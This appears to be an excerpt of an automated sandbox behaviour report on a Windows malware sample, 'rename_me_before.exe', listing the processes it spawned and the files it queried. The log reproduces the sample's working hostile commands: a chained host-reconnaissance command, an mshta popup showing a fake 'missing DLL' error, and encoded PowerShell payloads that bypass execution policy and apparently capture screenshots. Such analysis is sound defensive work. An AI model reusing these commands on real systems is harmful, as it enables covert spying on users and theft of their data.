            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /svc
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ROUTE.EXE route print
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh firewall show state
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh firewall show config
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
            Source: C:\Windows\System32\query.exe | Process created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
            Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
            Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
            Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
            Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71B8.tmp" "c:\Users\user\AppData\Local\Temp\iqddoona\CSCE5D39DCC87804C2589D261464B53262.TMP"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()""
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()"
            Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqb
tagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgao
ag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
            Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()""
            Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgao
ag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
            Source: C:\Users\user\Desktop\rename_me_before.exe | Code function: 0_2_00007FF640508880 cpuid 0_2_00007FF640508880
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\attrs-23.2.0.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\attrs-23.2.0.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\attrs-23.2.0.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\attrs-23.2.0.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography-42.0.8.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography-42.0.8.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography-42.0.8.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography-42.0.8.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography-42.0.8.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography-42.0.8.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography-42.0.8.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography-42.0.8.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962 VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\attrs-23.2.0.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography-42.0.8.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\frozenlist VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\libffi-8.dll VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\libssl-3.dll VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\multidict VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\python3.dll VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\python311.dll VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\select.pyd VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\sqlite3.dll VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\yarl VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\_asyncio.pyd VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\_decimal.pyd VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\_sqlite3.pyd VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\Desktop\rename_me_before.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
